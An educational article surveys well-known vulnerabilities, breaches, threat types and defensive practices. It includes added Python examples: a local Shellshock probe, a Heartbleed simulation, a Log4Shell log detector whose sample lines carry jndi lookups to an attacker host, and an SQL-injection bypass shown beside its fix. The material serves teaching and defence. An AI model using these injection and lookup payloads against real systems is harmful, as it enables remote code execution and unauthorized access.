Types of Cybersecurity Threats, and How to Avoid Them
The United States military currently recognizes five domains of warfare: land, sea, air, space, and information. The first four are what you would expect, but information? Has information become important enough to be a warfare domain for one of the greatest powers in the world? The answer is clearly yes.
Many countries now believe that a cyberattack causing no physical damage at all can be far more harmful than a bloody war. Following that logic, they have created specialized information security units that serve their political goals by collecting intelligence on adversaries and other countries, and they keep teams ready to launch cyberattacks against any country that threatens their national security.
In 2010, centrifuges at an Iranian nuclear enrichment facility were being damaged while the scientists and operators believed they were dealing with an ordinary technical fault that could be fixed easily. That wasn't the case: the root cause was a sophisticated piece of malware. Starting a war with such a country to stop its programme could not have been politically justified, but malware carried in on a USB stick was enough to get the job done.
That malware is called Stuxnet, and it is still considered one of the most complex pieces of malware ever discovered. It is also one of the early events that forced many countries to take the importance of information seriously.
In this article we discuss what cybersecurity threats are, their types, and their sources, and then suggest practical steps to reduce your exposure to them.
What is a Cybersecurity Threat?
A cybersecurity threat is any method a malicious actor could use to gain unauthorized access to your devices and systems, or to damage, leak, or misuse your data. Cyber threats can originate from many sources, including lone hackers, hacktivists, terrorist groups, corporate spies, criminal organizations, and others.
In the following section we look at some of the best-known cyber-attacks and threats, and then explain why protecting ourselves against them matters.
Famous Cybersecurity Threats Examples
There are a great many cybersecurity threats; we will go through the most famous ones, those that caused a stir when they were discovered.
1- EternalBlue (MS17-010)
EternalBlue is one of the most famous exploits ever used to gain remote access to Windows machines. It was developed by the NSA (U.S. National Security Agency) and leaked publicly by the Shadow Brokers in 2017. It targets a flaw in SMBv1, a file-sharing protocol that was enabled by default on Windows at the time, which left millions of Windows computers exposed to it.
Imagine the threat of having such a dangerous exploit publicly available for anyone to use. It did not stop there: the WannaCry ransomware used EternalBlue to spread itself to unpatched computers.
2- Shellshock (CVE-2014-6271)
Shellshock is a vulnerability in the Unix Bash shell that causes Bash to execute commands hidden in environment variables. Without going deep into the technicalities: when a network-facing program (a CGI web script, for example) passes attacker-controlled input to Bash through the environment, the attacker can run commands on the server remotely, which is known as remote code execution.
It was so notorious because the bug was in Bash itself, which is why it is also known as Bashdoor. Threat actors did not stop there: within hours of disclosure they were using it to build botnets of vulnerable systems (a bot is a piece of malicious software that takes orders from a controller) and then used those bots to launch DDoS (distributed denial of service) attacks against other targets.
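The quickest way to see the mechanism is the classic Shellshock test: export a variable whose value looks like a function definition followed by an extra command, then start a new Bash. A vulnerable Bash runs the trailing command while importing the environment, before the real command executes. The check below is an added example written for this article, not code from the original page; it assumes `bash` is on the PATH and the marker string is arbitrary.

```python
import os
import subprocess

# Constructed probe: a function definition followed by a trailing command.
# Vulnerable bash (before the CVE-2014-6271 patches) executes the trailing
# "echo" while importing the environment; patched bash treats X as plain text.
PROBE_VALUE = "() { :;}; echo SHELLSHOCK_MARKER"


def shellshock_check(bash_path="bash"):
    """Return 'vulnerable', 'patched' or 'bash not found' for the given bash binary."""
    env = dict(os.environ)
    env["X"] = PROBE_VALUE  # any variable name works: the value is what matters
    try:
        result = subprocess.run(
            [bash_path, "-c", "echo done"],
            env=env, capture_output=True, text=True, timeout=10,
        )
    except FileNotFoundError:
        return "bash not found"
    # A patched bash prints only "done"; a vulnerable one prints the marker first.
    if "SHELLSHOCK_MARKER" in result.stdout:
        return "vulnerable"
    return "patched"


if __name__ == "__main__":
    print(shellshock_check())
```

The same shape is what a CGI server hands to Bash: HTTP headers such as User-Agent are exported as environment variables, so an attacker who controls a header controls a variable value, and with it the command that runs.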
3- Kerberos Privilege Escalation (MS14-068)
Kerberos is a network authentication protocol that uses tickets to let nodes communicating over an insecure network prove their identity to one another securely. From that definition alone it is clear how important the protocol is.
However, in 2014 a flaw was found in Microsoft's Kerberos implementation that allowed an ordinary authenticated domain account to elevate its privileges and compromise the entire domain (going from regular user to domain administrator). So at the time, an attacker who gained access to a single domain user account could take over the whole domain.
Imagine the threat in a domain with thousands of users, any one of whom could become the domain administrator with access to sensitive information, databases, and other users' accounts.
4- Windows Server Service Vulnerability (MS08-067)
This is an old vulnerability (from 2008), but it is worth mentioning because it was extremely widespread when it was discovered. According to Microsoft it is a remote code execution vulnerability: an attacker who successfully exploited it could take complete control of an affected system remotely.
On Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication and run arbitrary code. A failed exploit attempt could also crash the Server service, which provides file, print, and named-pipe sharing over the network. In short, if your system was not patched and an attacker tried to exploit it, he would either gain remote code execution or at least disrupt your system.
Shortly after the patch was released, the Conficker worm began exploiting MS08-067 in the wild, infecting every vulnerable system it came across, and other worms and malware used the same vulnerability to attack Windows systems.
5- Heartbleed (CVE-2014-0160)
You have surely heard of HTTPS, where the S stands for secure, but how is the connection secured? Simply put, the traffic between your side and the server is encrypted, so an attacker sniffing your network sees nothing useful and cannot steal your data. On a large share of servers this encryption is provided by OpenSSL, a widely used library that implements the SSL/TLS protocols.
So far so good. TLS has an optional extension called Heartbeat, intended to keep a connection alive and check that the other side is still there: one side sends a small message containing a payload and a length field, and the other side echoes the payload back. If it sends 1 KB, the reply is 1 KB.
Unfortunately, OpenSSL never checked that the length field matched the payload actually sent. An attacker could send a tiny payload but claim it was up to 64 KB long, and the server would reply with that many bytes copied straight out of its memory. Those bytes might be garbage or they might be sensitive data, so attackers sent request after request until something juicy came back. That is why the vulnerability is called Heartbleed.
Bugs in a single program or library come and go and are fixed by patches. But this bug left an enormous number of private keys, passwords, and other secrets exposed to the Internet, and patching alone is not enough: any key or credential that lived on a vulnerable server has to be treated as compromised and replaced.
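The missing check is small enough to show in full. The simulation below is an added example for this article, not OpenSSL's code: it models a heartbeat record (one type byte, a two-byte length, the payload, and at least 16 bytes of padding, per RFC 6520) sitting in a bytearray that stands in for process memory, with a constructed placeholder secret placed right after it. The vulnerable handler trusts the length field; the fixed handler discards any record whose claimed length does not fit.

```python
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # RFC 6520: a heartbeat carries at least 16 bytes of random padding


def build_heartbeat(claimed_length, actual_payload):
    """Build a HeartbeatRequest whose length field may lie about the payload size."""
    return struct.pack("!BH", HB_REQUEST, claimed_length) + actual_payload + b"\x00" * PADDING


def heartbeat_vulnerable(memory, record_length):
    """Pre-1.0.1g logic: trust the peer-supplied length field."""
    hb_type, payload_len = struct.unpack("!BH", memory[:3])
    if hb_type != HB_REQUEST:
        return None
    # No check that payload_len fits inside the record, so the copy runs past
    # the record into whatever happens to sit next to it in process memory.
    payload = bytes(memory[3:3 + payload_len])
    return struct.pack("!BH", HB_RESPONSE, payload_len) + payload + b"\x00" * PADDING


def heartbeat_fixed(memory, record_length):
    """1.0.1g logic: discard any heartbeat whose claimed length exceeds the record."""
    if record_length < 1 + 2 + PADDING:
        return None  # too short to even hold type, length and padding
    hb_type, payload_len = struct.unpack("!BH", memory[:3])
    if hb_type != HB_REQUEST:
        return None
    if 1 + 2 + payload_len + PADDING > record_length:
        return None  # RFC 6520 says to silently discard such a message
    payload = bytes(memory[3:3 + payload_len])
    return struct.pack("!BH", HB_RESPONSE, payload_len) + payload + b"\x00" * PADDING


# Constructed placeholder standing in for key material adjacent on the heap.
SECRET = b"-----BEGIN RSA PRIVATE KEY----- (constructed placeholder, not a real key)"


def demo(claimed_length=4000):
    """Attacker sends a 2-byte payload but claims `claimed_length` bytes."""
    record = build_heartbeat(claimed_length, b"hi")
    # Constructed "process memory": the record, then the secret, then more heap.
    memory = bytearray(record + SECRET + b"\x00" * claimed_length)
    return heartbeat_vulnerable(memory, len(record)), heartbeat_fixed(memory, len(record))


if __name__ == "__main__":
    leaked, dropped = demo()
    print("vulnerable reply leaks secret:", SECRET in leaked)
    print("fixed reply:", dropped)
```

Note that the bug is a bounds check on a length the peer controls, not a cryptographic weakness; the encrypted channel faithfully delivered whatever the server copied.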
6- Dirty COW (CVE-2016-5195)
According to Red Hat, a race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus escalate their privileges on the system. In short, a vulnerable kernel lets a local user become the superuser (root).
This kernel-level bug affects a huge range of Linux systems, and exploiting it leaves no obvious trace in the logs. So any system that has not been updated faces a serious threat: any low-privileged user can become root with little effort.
7- Pwnkit (CVE-2021-4034)
This vulnerability was discovered by the Qualys research team at the end of 2021, so it is recent and many systems are still vulnerable to it today. It affects most Linux distributions because it is a memory-corruption bug in polkit's pkexec, a SUID-root program installed by default, and it lets any low-privileged local user gain root privileges on the vulnerable host. Until the patched package is installed, removing the SUID bit from pkexec (chmod 0755 /usr/bin/pkexec) is the mitigation Qualys published, at the cost of breaking pkexec itself.
8- Log4j / Log4Shell (CVE-2021-44228)
According to Oracle, about 3 billion devices run Java, so it was a big event when a vulnerability was announced in Log4j, the most widely used Java logging library; even some Minecraft servers were vulnerable. The flaw allows unauthenticated remote code execution: if attacker-controlled text reaches a log statement, Log4j's lookup feature resolves strings such as ${jndi:ldap://...} by fetching and loading code from the attacker's server. Vulnerable products were found at some of the largest technology vendors, including AWS, IBM, Cloudflare, Cisco, Apple iCloud, Minecraft: Java Edition, Steam, and VMware. It was a great threat with a very wide attack surface.
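Because the trigger is a string in any logged field, the first thing defenders did was sweep their logs for it. The detector below is an added example for this article, not a vendor's or the Log4j project's code; the log lines are constructed samples. It undoes the two evasions seen most often in the wild, URL-encoding and nested lookups such as ${lower:j} or ${::-j} that resolve to a single character, before matching the jndi lookup.

```python
import re
import urllib.parse

# Constructed sample access-log lines: one benign, three Log4Shell probes
# with increasing levels of obfuscation.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 612 "-" "%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fc%7D"',
]

# The lookup that triggers the bug, once evasions are undone.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Nested lookups that resolve to plain text: ${lower:J}, ${upper:n}, ${::-j}, ${env:NOPE:-j}
CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def _apply_case(m):
    text = m.group(2)
    return text.lower() if m.group(1).lower() == "lower" else text.upper()


def normalize(s):
    """Undo (possibly layered) URL-encoding and collapse nested lookups, innermost first."""
    for _ in range(3):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    prev = None
    while prev != s:  # repeat until no nested lookup is left to collapse
        prev = s
        s = CASE_RE.sub(_apply_case, s)
        s = DEFAULT_RE.sub(lambda m: m.group(1), s)
    return s


def find_jndi_probes(lines):
    """Return the raw log lines that contain a JNDI lookup after normalization."""
    return [line for line in lines if JNDI_RE.search(normalize(line))]


if __name__ == "__main__":
    for hit in find_jndi_probes(SAMPLE_LOG_LINES):
        print("probe:", hit)
```

A hit in the access log only proves someone sent the string; whether anything was exploited depends on whether a vulnerable Log4j logged that field, so pair the sweep with an inventory of Log4j versions and with egress logs showing LDAP or RMI connections to the addresses in the lookups.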
At this point we should have a clear picture of how bad a security threat can be: it can lead to full system compromise, leaked data, and destroyed systems. We have also seen threat actors chaining one threat onto another for a more powerful effect. So it is really important to keep up with newly published vulnerabilities and to patch your systems and assets when they are affected.
Now we will look at some of the most famous and most recent cyber attacks.
Famous Cyber Attacks:
NASA Cyber Attack (1999)
In 1999 a 15-year-old American hacker caused a 21-day shutdown of NASA computers, with a recovery cost of $41,000. He became the first juvenile to be incarcerated for computer crimes, serving six months for his offences.
The Biggest Password Leak (2009)
rockyou.txt: if you work in cybersecurity you have heard of it. It is a huge password wordlist, with roughly 14 million unique passwords in the version shipped with most pentesting distributions (the "RockYou2021" compilation, which stacks many later breaches on top of it, runs to over 8.4 billion entries). But what is the story behind it? RockYou was a company that built widgets for MySpace and applications for Facebook and other social networks.
In late 2009 a SQL injection vulnerability was found in its website, which had over 32 million users at the time. The vulnerability was bad enough, but the bigger problem was that RockYou stored its users' passwords in plaintext, so once the database was dumped the passwords were simply there. They were posted publicly on forums, and from then on people kept extending the list with every new password breach until it became the rockyou.txt you know today. Since we are talking about passwords, you can check our other article here on what to do if your password has been compromised.
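Both halves of the RockYou failure are easy to reproduce. The example below is added for this article and is not RockYou's code: it uses an in-memory SQLite table with constructed sample rows, shows a login query built by string concatenation being bypassed with the classic `' OR '1'='1` input next to the parameterized version that is not, and then shows how the same table should have stored passwords, as salted PBKDF2 hashes, so that a dump does not hand out credentials even if the injection is missed.

```python
import hashlib
import hmac
import os
import sqlite3


def setup_db():
    """Constructed sample: a users table with plaintext passwords, as RockYou stored them."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "123456"), ("bob", "iloveyou")])
    return db


def login_vulnerable(db, username, password):
    """String concatenation: user input becomes part of the SQL grammar."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}' ORDER BY username")
    return [row[0] for row in db.execute(query)]


def login_parameterized(db, username, password):
    """Bound parameters: user input is always data, never SQL."""
    query = ("SELECT username FROM users WHERE username = ? "
             "AND password = ? ORDER BY username")
    return [row[0] for row in db.execute(query, (username, password))]


# Even with the injection fixed, a dump of the table must not hand out passwords.
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor in the range OWASP recommends


def hash_password(password, salt=None):
    """Return a self-describing salted hash: algorithm$iterations$salt$digest."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    db = setup_db()
    probe = "' OR '1'='1"
    print("vulnerable   :", login_vulnerable(db, "nobody", probe))
    print("parameterized:", login_parameterized(db, "nobody", probe))
    stored = hash_password("iloveyou")
    print("stored as    :", stored)
    print("verify       :", verify_password("iloveyou", stored))
```

The injected input turns the WHERE clause into `username = 'nobody' AND password = '' OR '1'='1'`, which is true for every row; with bound parameters the same text is compared as a literal password and matches nothing. Storing the hash with its own salt and iteration count lets you raise the work factor later without invalidating existing records.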
Adobe Cyber Attack (2013)
One of the largest data breaches of the century: in 2013 attackers stole login information for about 38 million Adobe users along with nearly 3 million encrypted credit card records. The breach came to light when the data was put up for sale on the dark web.
The company also reported that the attackers stole source code for three products: Acrobat, ColdFusion, and ColdFusion Builder, a huge blow for Adobe at the time. Read Adobe cyber attack for more details.
Target Cyberattack (2013)
2013 was also the year of the Target breach: during the holiday season cybercriminals accessed data for about 40 million credit and debit card accounts that had been used for purchases at Target. The incident later cost the retailer around $18.5 million in a multistate settlement of the lawsuits brought against it. [Red river]
Ukraine’s Power Grid Attack (2015)
This was the first publicly acknowledged successful cyberattack on a power grid. In December 2015 an attack on Ukraine's power grid caused outages for around 225,000 customers lasting one to six hours. It took place during the ongoing Russian military intervention in Ukraine and is attributed to a Russian APT (advanced persistent threat) group known as Sandworm.
The first stage is believed to have used an updated version of the BlackEnergy malware, delivered through phishing emails with malicious attachments to specific individuals at the energy companies, in order to harvest administrator credentials and gain access to the substation networks.
In the second phase the attackers deployed KillDisk, a destructive malware that wiped parts of the hard drives and prevented systems from rebooting, which hampered recovery and prolonged the outage. [Reference]
WannaCry Ransomware (2017)
We discussed EternalBlue above and how attackers built a more damaging threat on top of it: the WannaCry ransomware. The 2017 outbreak disrupted hospitals, banks, and telecommunications companies worldwide. Four years later, during the COVID-19 pandemic, it resurfaced, as the shift to remote work made it easier to deliver malware to unpatched machines. Check our article on how to stay secure while working from home.
Kaseya Supply Chain Ransomware Attack (2021)
In July 2021 Kaseya VSA and multiple managed service providers (MSPs) were hit by a supply-chain ransomware attack. Kaseya sells software that helps other companies manage their IT, and it received reports from customers and others of unusual behaviour on endpoints managed by the on-premises Kaseya VSA product.
The attack is attributed to the Russian ransomware group REvil, active since 2019 and responsible for ransomware attacks on targets around the world that earned it a fortune in ransom payments. With Kaseya, REvil took its tactics to a new level: by compromising the software that MSPs use to manage their customers, a single supply-chain attack reached a far larger set of victims. [Reference]
Now that we have showcased some famous exploitable threats and some famous cyber attacks, it should be clear why we must protect ourselves against cybersecurity threats. Threat actors are a danger to every company in the world; what separates companies is how they behave when they face a real threat and how they find their way out of an attack.
Types of Cybersecurity Threats:
In the following section we briefly discuss the most common types of cybersecurity threats. For more detail on each type, check our previous article here.
Malware
Malware attacks are the most common type of cyberattack. Malware is malicious software that gets onto a system when a user clicks a dangerous link or downloads files from untrusted sources. Once inside, it can block access to critical components of the network, damage the system, and gather confidential information, and malware built for a specific target may spread across the network until it reaches the goal it was made for.
Trojan
A program with malicious intent hidden inside a seemingly useful one. It usually arrives through downloads from untrusted sources and is commonly used to plant a backdoor for attackers.
Spyware
A program installed to gather information about users, their systems, or their browsing history and send it to a remote operator. The attacker can then use the information for blackmail or download and install further malicious programs. The most famous spyware of all is worth mentioning here: Pegasus, developed by the NSO Group.
Pegasus targets mobile phones (iOS and Android) and can read text messages, track calls, collect passwords, track location, access the device's microphone and camera, and harvest data from apps. It is marketed to governments for tracking criminals and has also been used to pursue political aims.
Phishing
Cybercriminals send malicious emails that appear to come from legitimate sources. The user is tricked into clicking a link in the email, which leads to malware installation or worse. Phishing campaigns have increased over the last couple of years, targeting people working from home and highly privileged users within companies.
Advanced Persistent Threats (APT)
An advanced persistent threat is a malicious actor who gains unauthorized access to a system or network and, unlike opportunistic attackers, aims to extend that access across the network and keep it undetected for a long time in order to steal a variety of sensitive information.
These attacks evolve and proceed through organized phases until the goal is reached: gaining initial access, privilege escalation, lateral movement, post-exploitation, and further phases depending on the target infrastructure.
Data Breach
Many data breaches happen as a result of a small mistake by a careless employee, or otherwise unintentionally. According to Kaspersky's definition, a data breach exposes confidential, sensitive, or protected information to an unauthorized person: the files are viewed and/or shared without permission.
A data breach does not just mean you have to change your password; the effects of a leak can be lasting damage to your reputation, finances, and more.
Zero-Day
A zero-day is a recently discovered vulnerability that attackers can use before a fix exists. There is no direct remedy for such a risk, but keeping software up to date, reducing the number of exposed services, and monitoring for abnormal behaviour limit what an attacker can do with one.
Sources of Cybersecurity Threats:
Now that we know the types of threats, we can look at where cybersecurity threats come from so that we can try to avoid them.
Hackers
Hackers typically scan networks looking for vulnerabilities in computer systems or networks, then exploit them to gain access. They do it for several reasons: financial gain, revenge, stalking, personal advantage, and so on, or simply to brag in the hacker community.
Criminal Organizations
Organized criminal groups usually target large numbers of people rather than an individual, using techniques such as phishing, spyware, malware, or ransomware for financial gain. They can be thought of as organized hackers.
Corporate Spies
Corporate spies aim to profit by leaking a company's sensitive information or causing it damage for the benefit of a competitor. The main difference between spies and insiders is that spies are an outside threat.
Insiders
Insiders include employees, third-party vendors, contractors, and other business associates who have legitimate access to enterprise assets but misuse that access for personal or financial reasons.
Hacktivists
Hacktivists act mainly for political reasons rather than financial gain. They target companies, organizations, or individuals who do not share their political views and agenda, and their purpose is to gain visibility for the cause they are promoting.
Terrorists
Terrorists launch cyber-attacks to destroy and disrupt systems, networks, and infrastructure, with no negotiation; they can also harm individuals if they get the chance. Their main goals are destruction, economic disruption, and spreading fear.
Cybersecurity Best Practices to Protect from Cyber Threats:
Today's threats are not only the ones we are used to hearing about: remote work has opened new opportunities for malicious actors to deliver their attacks, so we must be aware enough to face them all.
In the following section we discuss some practical tips to minimize the attack surface as much as possible.
How to Prevent Cyber Attacks at Home:
We have a full article on this topic in more detail; you can check it here. The quick points:
• Secure your home network.
• Use strong passwords.
• Connect to your company’s network through a VPN.
• Invest in Backup storage (cloud, hard drive).
• Use separate devices for work and others for personal usage.
• Do not open emails from untrusted sources.
• Do not download software from untrusted websites.
• Use your company’s tool kit.
• Install available updates and patches for your systems and software.
• Turn on two-factor authentication on your accounts.
• Secure your home router.
How to Prevent Cyber Attacks on Businesses?
- Train Employees
Employees are an organization's first line of defense against cyber threats. Organizations must run security awareness programs that train employees to recognize and respond to threats and to report anything that looks abnormal.
- Update Systems and Software
We mentioned several famous vulnerabilities above, and the way to avoid being exploited by them is simple: update. Software vendors release patches to fix vulnerabilities and keep you safe, so check that you are running the latest versions of your operating system and software.
- Backup Data
Would your jewellery be safe if it were all in one box? Only if access to the box is limited and you follow best practices. The same holds for data: back it up regularly, keep at least one copy offline or otherwise out of reach of the production network, and test that you can restore it, so that a ransomware attack or data loss does not become a disaster.
- Perform a Regular Cyber Risk Assessment
Regular risk assessments are highly effective. One part of them is hiring a team to do what a real threat actor would do to compromise your network (a penetration test): their job is to try to gain unauthorized access and, if they succeed, to see how far a real attacker could get. This shows clearly where the security flaws in your systems are and tests your employees' awareness at the same time.
- Secure your Devices and Network
If your company has many departments, segment the network so that each department has its own small network that the others cannot reach. That limits an attacker who gains access to one department: it does not mean he can go beyond it. Also use modern controls to detect and block malicious behaviour on your network: firewalls, IDS, IPS, deep packet inspection, and others.
- Set Policies
Commonly, an attacker who gains low-privileged access (perhaps through outdated software or an old operating system) can escalate to higher privileges, even administrator of the network, because of poorly set policies. Restrict admin access tightly, give no user unnecessary rights, and if a user needs admin access for a specific task, remove it as soon as the task is done. Follow best practices such as the least-privilege administrative models described here.
- Build a Cyber Incident Response Plan
A large share of companies discover they were breached only months after the attack, and some never find out at all. Whatever the cause, you can be attacked, so be prepared for the day it happens.
A risk assessment is the first step to finding security flaws, and even to spotting malicious behaviour already present on your network. The incident response plan itself consists of instructions on how to respond to a serious security incident such as a data breach, a data leak, a ransomware attack, or the loss of sensitive information.
The NIST incident response lifecycle breaks incident response into four phases: Preparation; Detection and Analysis; Containment, Eradication, and Recovery; and Post-Incident Activity.
Finally, the golden tips: prepare for anything, back up your data, enforce strict security policies, apply updates and patches, and hope you stay far from malicious eyes.